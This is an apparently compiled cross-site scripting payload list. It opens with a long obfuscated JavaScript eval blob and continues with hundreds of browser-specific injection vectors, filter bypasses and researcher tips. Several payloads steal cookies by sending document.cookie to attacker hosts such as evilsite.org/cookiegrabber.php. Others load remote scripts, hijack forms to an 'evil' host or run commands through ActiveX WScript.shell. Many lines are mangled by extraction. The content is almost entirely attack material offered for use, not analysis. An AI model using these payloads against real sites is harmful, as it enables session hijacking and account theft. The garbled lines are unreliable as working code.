(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()
'));)>
< script > < / script>
<
<
<
<
<
<<
<<<
">"
<script>alert("XSS")
<alert("XSS");//<
alert(document.cookie)
'>alert(document.cookie)
'>alert(document.cookie);
";alert('XSS');//
%3cscript%3ealert("XSS");%3c/script%3e
%3cscript%3ealert(document.cookie);%3c%2fscript%3e
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
<script>alert(document.cookie);
<script>alert(document.cookie);<script>alert
alert('XSS')
![]()
![]()
![]()
![]()
![]()
![]()
![]()
alert("XSS")">
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
">document.location='http://your.site.com/cgi-bin/cookie.cgi?'???.cookie
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//>!--alert(String.fromCharCode(88,83,83))=&{}
'';!--"=&{()}
','')); phpinfo(); exit;/*
var n=0;while(true){n;}]]>
SCRIPT]]>alert('XSS');/SCRIPT]]>
SCRIPT]]>alert('XSS');/SCRIPT]]>
]]>
<IMG SRC="javascript:alert('XSS')">
▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉
TWITTER @xssvector Tweets:
Opera cross-domain set cookie 0day: document.cookie='xss=jackmasa;domain=.me.'
Reverse 401 basic auth phishing by @jackmasa POC:
document.domain='com' chrome/safari same domain suffix cross-domain trick.
Safari empty location bar bug by @jackmasa POC:
Safari location object pollution tech: by @kinugawamasato
Safari URL spoofing about://mmme.me POC:
Opera URL spoofing vuln data://mmme.me by @jackmasa POC:
Universal URL spoofing data:;//mmme.me/view/1#1,2 #firefox #safari #opera
New dom xss vector xxx.innerHTML=document.title by @0x6D6172696F
Opera data:message/rfc822 #XSS by @insertScript
#IE
IE cool expression xss
Clever webkit xss auditor bypass trick <scRipt %00>prompt(/@soaj1664ashar/)
IE xss filter bypass 0day : <xml:namespace prefix=t><import namespace=t implementation=..... by @gainover1 #IE #0day
<iframe srcdoc='<svg/onload=alert(/@80vul/)>'> #chrome
IE xss filter bypass 0day :<script/%00%00v%00%00>alert(/@jackmasa/) and %c0″//(%000000%0dalert(1)// #IE #0day
new XMLHttpRequest().open("GET", "data:text/html,", false); #firefox #datauri
XSS
*:after{content:url()} #firefox
alert(/@ma1/)![]()
#IE
"clickme #IE #xssfilter @kinugawamasato
Components.lookupMethod(self, 'alert')(1) #firefox
external.NavigateAndFind(' ',[],[]) #IE #URLredirect
IE decides charset as #utf-7 @hasegawayosuke
#opera
#chrome
MsgBox"@insertScript"<i> #IE9 #svg #vbscript
setTimeout(['alert(/@garethheyes/)']); #chrome #safari #firefox
<svg></ y="><x" onload=alert('@0x6D6172696F')> #svg
Event.prototype[0]='@garethheyes',Event.prototype.length=1;Event.prototype.toString=[].join;onload=alert #webkit #opera
URL-redirect vuln == XSS ! Location:data:text/html,<svg/onload=alert(document.domain)> #Opera @jackmasa
<a href="data:application/x-x509-user-cert;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">click</a> #Chrome #XSS @RSnake
Clipboard-hijack without script and css: http://<bdo dir=rtl>elgoog</bdo>.com
Opera:<style>*{-o-link:'data:text/html,<svg/onload=alert(/@garethheyes/)>';-o-link-source:current}</style><a href=1>aaa
$=<>@mozilla.org/js/function</>;$::[<>alert</>](/@superevr/) #firefox
Firefox cookie xss: with(document)cookie='∼≩≭≧∯≳≲≣∽≸≸∺≸∠≯≮≥≲≲≯≲∽≡≬≥≲≴∨∱∩∾',write(cookie); by @jackmasa
<svg><script>location=<>javascript&#x3A;alert(1)<!/> #Firefox #JustForFun
Just don't support IE click
//<!-- -->*{x:expression(alert(/@jackmasa/))}//
#IE #XSS
Input[hidden] XSS target it.
Firefox clipboard-hijack without script and css : http://![evil/#]()
#E4X <{alert(1)}>{alert(2)}>.(alert(3)).@wtf.(wtf) by @garethheyes
#vbscript coool feature chr(&H4141)="A", Chr(7^5)=A and Chr(&O41) =‘A’ by @masa141421356
({})[$='\143\157\156\163\164\162\165\143\164\157\162'][$]('\141\154\145\162\164\50/ @0x6D6172696F /\51')()
No referer :
/**/alert(' @0x6D6172696F ')//*/
#VBScript Event Handling: [Sub XXX_OnError MsgBox " @0x6D6172696F " End Sub]
if(1)alert(' @jackmasa ')}{ works in firebug and webkit's console
alert(1) #opera by @soaj1664ashar
<![if<iframe/onload=vbs::alert[:]> #IE by @0x6D6172696F, @jackmasa
<svg><script/XL:href= data:;;;base64;;;;,<>啊YWx啊lc啊nQ啊oMSk啊=> mix! #opera by @jackmasa
<! XSS="><img src=xx:x onerror=alert(1)//"> #Firefox #Opera #Chrome #Safari #XSS
document.body.innerHTML=('<\000\0i\000mg src=xx:x onerror=alert(1)>') #IE #XSS
header('Refresh: 0;url=javascript:alert(1)');
<script language=vbs>![]()
click
#CSS expression *{font-family:'Serif}';x[value=expression(alert(URL=1));]{color:red}
#ES #FF for(location of ['javascript:alert(/ff/)']);
#E4X function::['location']='javascript'':alert(/FF/)'
HTML5 entity char test
#Firefox click eval(test'') by @cgvwzq
CSS and CSS :P
toUpperCase XSS document.write('<ı onclıck=alert(1)>asdı>'.toUpperCase()) by @jackmasa
IE6-8,IE9(quick mode) with jQuery<1.7 $("button").val("") by @masa141421356
aha alert(/IE|Opera/)
Opera bug? 
Use 127.1 no 127.0.0.1 by @jackmasa
IE vector location='vbscript:alert(1)'
#jQuery super less-xss,work in IE: $(URL) 6 chars
#Bootstrap tooltip.js xss some other plugins (e.g typeahead,popover) are also the same problem //cc @twbootstrap
innerText DOM XSS: innerHTML=innerText
Using IE XSS filter or Chrome xss auditor to block url redirect.
jQuery 1.8 a new method: $.parseHTML('![]()
')
IE all version CSRF vector ![]()
Timing vector 
Firefox data uri can inherit dom-access.
IE9
Webkit and FF
Firefox E4X vector alert(<xss>xs{[function::status]}s</xss>) it is said E4H would replace E4X :P
IE8 document.write('<img src="<iframe/onload=alert(1)>\0">')
If you want to share your cool vector, please do not hesitate to let me know :)
ASP trick: ?input1=<script/&in%u2119ut1=>al%u0117rt('1')</script> by @IRSDL
New spec:<iframe srcdoc="<svg/onload=alert(domain)>"> #chrome 20 by @0x6D6172696F
#Firefox syntax broken try{*}catch(e if(alert(1))){} by @garethheyes
JSON XSS Tips: /json.cgi?a.html by @hasegawayosuke
JSON XSS Tips: /json/.html with PHP and .NET by or /json;.html with JSP by @superevr
ß=ss <a href="http://ß.lv">click</a> by @_cweb
<a href="http://www。example。com">click</a> by @_cweb
Firefox link host dom xss https://t.co/aTtzHaaG by @garethheyes
<a href="http://www﹒example﹒com ">click</a> by @_cweb
history.pushState([],[],'/xssvector') HTML5 URL spoofing!
Clickjacking with history.forward() and history.back() by @lcamtuf
Inertia-Clickjacking for(i=10;i>1;i--)alert(i);new ActiveXObject("WScript.shell").Run('calc.exe',1,true); by @80vul
XHTML Entity Hijacking [<!ENTITY nbsp "'">] by @masa141421356
Firefox <img src=javascript:while([{}]);>
IE <!--[if<img src=x:x onerror=alert(5)//]--> by @0x6D6172696F H5SC#115
Firefox funny vector for(i=0;i<100;) find(); by @garethheyes
IE breaking framebusting vector <script>var location={};</script>
IE JSON hijack with UTF-7 json={'x':'',x:location='1'} <script src=... charset=utf-7></script>
Firefox <iframe src=view-source://xxxx.com>; with drag and drop
<button form=hijack_form_id formaction=//evil style="position:absolute;left:0;top:0;width:100%;height:100%"><plaintext> form hijacking
Dangling markup injection <img src='//evil by @lcamtuf
Webkit <iframe> viewsource attribute: // <iframe viewsource src="//test.de"></iframe> by @0x6D6172696F
DOM clobbering:<form name=location > clobbered location object on IE.
DOM clobbering:<form name=document><image name=body> clobbered document->body
<isindex formaction=javascript:alert(1)> by @jackmasa
Classic IE backtick DOM XSS: <img src="xx:x" alt="``onerror=alert(1)"><script>document.body.innerHTML=''</script>
Firefox <a href="https://4294967298915183000">click</a>=>google by @garethheyes
<a href="data:text/html;base64xoxoxox,<body/onload=alert(1)>">click</a> by @kkotowicz
Opera <a href="data:text/html;base64,PHN2Zy萨9vbmxv晕YWQ<>>9YWxlc>>>nQoMSk">click</a> variant base64 encode. by @jackmasa
Opera <svg><image x:href="data:image/svg-xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"> by LeverOne H5SC#88
Webkit and Opera <a href="\/www.google.com/favicon.ico">click</a> by @kkotowicz
FF <a href="//ⓜⓜⓜⓔ︒ⓜⓔ">click</a> url trick by @jackmasa
IE <script>-{valueOf:location,toString:[].pop,0:'vbscript:alert%281%29',length:1}</script> @thornmaker , @sirdarckcat
<i/onclick=URL=name> IE less xss,20 chars. by @0x6D6172696F
<a rel="noreferrer" href="//google.com">click</a> no referrer by @sneak_
FF <img src="jar:!/"> no referrer by @sneak_
No dos expression vector <i style=x:expression(alert(URL=1))> by @jackmasa
<svg><style>*{font-family:'<svg onload=alert(1)>';} by @0x6D6172696F
JSLR( @garethheyes ) challenge result:
@irsdl challenge result:
Vbscript XHR by @masa141421356
XML Entity XSS by @garethheyes
Webkit cross-domain and less vector! example: (JSFiddle cross to JSBin) by @jackmasa
@import//evil? >>>steal me!<<< scriptless by @garethheyes
IE <input value="<script>alert(1)</script>" ` /> by @hasegawayosuke
<xmp><img alt="</xmp><img src=xx:x onerror=alert(1)//"> Classic vector by slacker :D
<a href="#" onclick="alert(' ');alert(2 ')">name</a> Classic html entity inject vector
A nice opera xss: Put 65535 Bytes before and Unicode Sign by @insertScript
<iframe src="jar://html5sec.org/test.jar!/test.html"></iframe> Upload a jar file => Firefox XSS by @0x6D6172696F
JS Array Hijacking with MBCS encodings ppt by @hasegawayosuke
<meta http-equiv="refresh" content="0;url=http://good/[>>>inj];url=http://evil/[<<<inj]"> IE6-7 Inject vector by @kinugawamasato
IE UTF7 BOM XSS <link rel=stylesheet href='data:,?*%7bx:expression(alert(1))%7D' > by @garethheyes
<svg><script>a='<svg/onload=alert(1)></svg>';alert(2)</script> by @0x6D6172696F , @jackmasa
Opera <svg><animation x:href=javascript:alert(1)> SVG animation vector by @0x6D6172696F
<meta charset=gbk><script>a='xࠄ\';alert(1)//';</script> by @garethheyes
FF <a href="data:),< s c r i p t > a l e r t ( document.domain ) < / s c r i p t >">CLICK</a> by @0x6D6172696F
<noscript><!--</noscript><img src=xx:x onerror=alert(1) --> non-IE
<svg><script xlink:href="data:,alert(1)"> by @0x6D6172696F
Firefox statusline spoofing<math><maction actiontype="statusline#http://google.com" href="//evil">click by LeverOne
<svg><oooooo/oooooooooo/onload=alert(1) > by @jackmasa
<math><script>sgl='<img/src=xx:x onerror=alert(1)>'</script> chrome firefox opera vector by @jackmasa
FF <applet code=javascript:alert('sgl')> by @jackmasa
Nice IE DOM XSS: <div id=d><x xmlns="><body onload=alert(1)"><script>d.innerHTML=‘’</script> by LeverOne
<script>RuntimeObject("w*")["window"]["alert"](1);</script> IE a new method get window object! by @s_hskz
<body onload="$})}}}});alert(1);({0:{0:{0:function(){0({"> Chrome crazy vector! by @cgvwzq
IE <!-- `<img/src=xx:xx onerror=alert(1)//--!> by @jackmasa H5SC:
<a href="javascript:alert(1)">click</a> non-IE
<a href="feed:javascript:alert(1)">click</a> Firefox
<link href="javascript:alert(1)" rel="next"> Opera, pressing the spacebar execute! by @shafigullin
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> works on webkit by @garethheyes
▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉
MORE VECTORS:
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
"><script>alert(0)</script>
<script src=http://yoursite.com/your_files.js></script>
</title><script>alert(/xss/)</script>
</textarea><script>alert(/xss/)</script>
<IMG LOWSRC="javascript:alert('XSS')">
<IMG DYNSRC="javascript:alert('XSS')">
<font style='color:expression(alert(document.cookie))'>
<img src="javascript:alert('XSS')">
<script language="JavaScript">alert('XSS')</script>
[url=javascript:alert('XSS');]click me[/url]
<body onunload="javascript:alert('XSS');">
<script>alert(1);</script>
<script>alert('XSS');</script>
<script src="http://www.evilsite.org/cookiegrabber.php"></script>
<script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="??(document.cookie)</script>
<scr<script>ipt>alert('XSS');</scr</script>ipt>
<script>alert(String.fromCharCode(88,83,83))</script>
<img src=foo.png onerror=alert(/xssed/) />
<style>@import'javascript:alert("XSS")';
echo('alert("XSS")'); ?>
alert('XSS')
![]()
![]()
![]()
>
window.alert("Bonjour !");
onload=alert('XSS')>
">
'>><marquee><h1>XSS</h1></marquee>
'">><script>alert('XSS')
'">>XSS
var var = 1; alert(var)
BODY{background:url("javascript:alert('XSS')")}
='alert("XSS")'?>
![]()
" onfocus=alert(document.domain) "> <"
li {list-style-image: url("javascript:alert('XSS')");}- XSS
perl -e 'print "alert("XSS")";' > out
perl -e 'print ")
";' > out
alert(1)
alert(1)
document.write("XSS");
a="get";b="URL";c="javascript:";d="alert('xss');";eval(a?);
='>alert("xss")
"?="http://yoursite.com/xss.js?69,69">
alert(navigator.userAgent)>
">/XaDoS/>alert(document.cookie)
src="http://www.site.com/XSS.js">
">/KinG-InFeT.NeT/>alert(document.cookie)
src="http://www.site.com/XSS.js">
">
[color=red width=expression(alert(123))][color]
Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
">alert(123)
'">alert(1111)
'">alert(document.cookie)
'""> alert('X nS nS');
<<<<>>>><<<script>alert(123)
'>alert(123)
'>">
}a=eval;b=alert;a(b(/XSS/.source));
(123)(123)
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
<alert("XSS");//<
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");
![]()
![]()
li {list-style-image: url("javascript:alert('XSS')");}
- XSS
![]()
![]()
@import'http://ha.ckers.org/xss.css';
BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}
@import'javascript:alert("XSS")';
![]()
.XSS{background-image:url("javascript:alert('XSS')");}
BODY{background:url("javascript:alert('XSS')")}
href="javascript:alert(-1)">hello
Hello
Hello
![]()
![]()
![]()
" onhover="javascript:alert(-1)"
">alert('test')
▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉
ha.ckers.org / sla.ckers.org
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//>--!>alert(String.fromCharCode(88,83,83))
![]()
![]()
![]()
![]()
![]()
alert("XSS")">
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
<alert("XSS");//<
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
<SCRIPT>a=/XSS/
alert(a.source)
";alert('XSS');//
alert("XSS");
![]()
![]()
@import'http://ha.ckers.org/xss.css';
BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}
li {list-style-image: url("javascript:alert('XSS')");}
- XSS
![]()
![]()
![]()
@im\port'\ja\vasc\ript:alert("XSS")';
![]()
exp/*
alert('XSS');
.XSS{background-image:url("javascript:alert('XSS')");}
BODY{background:url("javascript:alert('XSS')")}
XSS
]]>
<IMG SRC="javascript:alert('XSS')">
alert('XSS');
" SRC="http://ha.ckers.org/xss.js">
'" SRC="http://ha.ckers.org/xss.js">
` SRC="http://ha.ckers.org/xss.js">
document.write("<SCRI");PT SRC="http://ha.ckers.org/xss.js">
XSS
XSS
XSS
XSS
XSS
XSS
XSS
XSS
XSS
XSS
XSS
XSS
XSS
XSS
▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉
100 #XSS Vectors by @soaj1664ashar
{font-family:'<iframe/onload=confirm(1)>'
<input/onmouseover="javaSCRIPT:confirm(1)"
<sVg><scRipt %00>alert(1) {Opera}
<img/src=`%00` onerror=this.onerror=confirm
<form><isindex formaction="javascript:confirm(1)"
<img src=`%00`
 onerror=alert(1)

<script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script>
<ScRipT 5-0*3?=>prompt(1)</ScRipT giveanswerhere=?
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
"><h1/onmouseover='\u0061lert(1)'>%00
<iframe/src="data:text/html,<svg onload=alert(1)>">
<meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>
<svg><script xlink:href=data:,window.open('https://www.google.com/')></script
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<iframe src=javascript:alert(document.location)>
<form><a href="javascript:\u0061lert(1)">X
</script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'>
<img/	  src=`~` onerror=prompt(1)>
<form><iframe 	  src="javascript:alert(1)" 	;>
<a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a
http://www.google<script .com>alert(document.location)</script
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a
<img/src=@  onerror = prompt('1')
<style/onload=prompt('XSS')
<script ^__^>alert(String.fromCharCode(49))</script ^__^
/**/alert(document.location)/**/
/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/
alert(0%0)
<///style///><span %2F onmousemove='alert(1)'>SPAN
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>'
<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
<marquee onstart='javascript:alert(1)'>^__^
<div/style="width:expression(confirm(1))">X</div> {IE7}
<iframe/%00/ src=javaSCRIPT:alert(1)
//<form/action=javascript:alert(document.cookie)><input/type='submit'>//
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt/*iframe/src*/>
//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/
|\>''alert(1) {Opera}
<a href="javascript:\u0061le%72t(1)"><button>
<div onmouseover='alert(1)'>DIV</div>
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
<a href="jAvAsCrIpT:alert(1)">X</a>
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<var onmouseover="prompt(1)">On Mouse Over</var>
<a href=javascript:alert(document.cookie)>Click Here</a>
<img src="/" =_=" title="onerror='prompt(1)'">
<%<!--'%><script>alert(1);
X
http://www.alert(1)
alert(1)
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
<img src=`xx:xx`onerror=alert(1)>
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
<meta http-equiv="refresh" content="0;javascript:alert(1)"/>
<math><a xlink:href="//jsfiddle.net/t846h/">click
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
<svg contentScriptType=text/vbs><script>MsgBox
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u006worksinIE>
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')
++1-+?(1)
/*<script* */alert(1)//
confirm(1);
alert(1)
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
<script x> alert style="x:">
<--`![]()
--!>
x
">
CLICKME
click
1
Click Me
▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉
AND EVEN MORE:
'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E
<window.onload=function(){document.forms[0].message.value='1';}
x”![]()
document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click();
Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())
var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();
var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])
xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();
alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])
alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])
<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); %73%63%72%69%70%74>
var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) ) alert(c[1]); }catch(e){} }; xdr.send();
ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); alert(Safe.get());
alert(document.head.innerHTML.substr(146,20));
alert(document.head.childNodes[3].text)
var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}
Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())
x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);
x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);
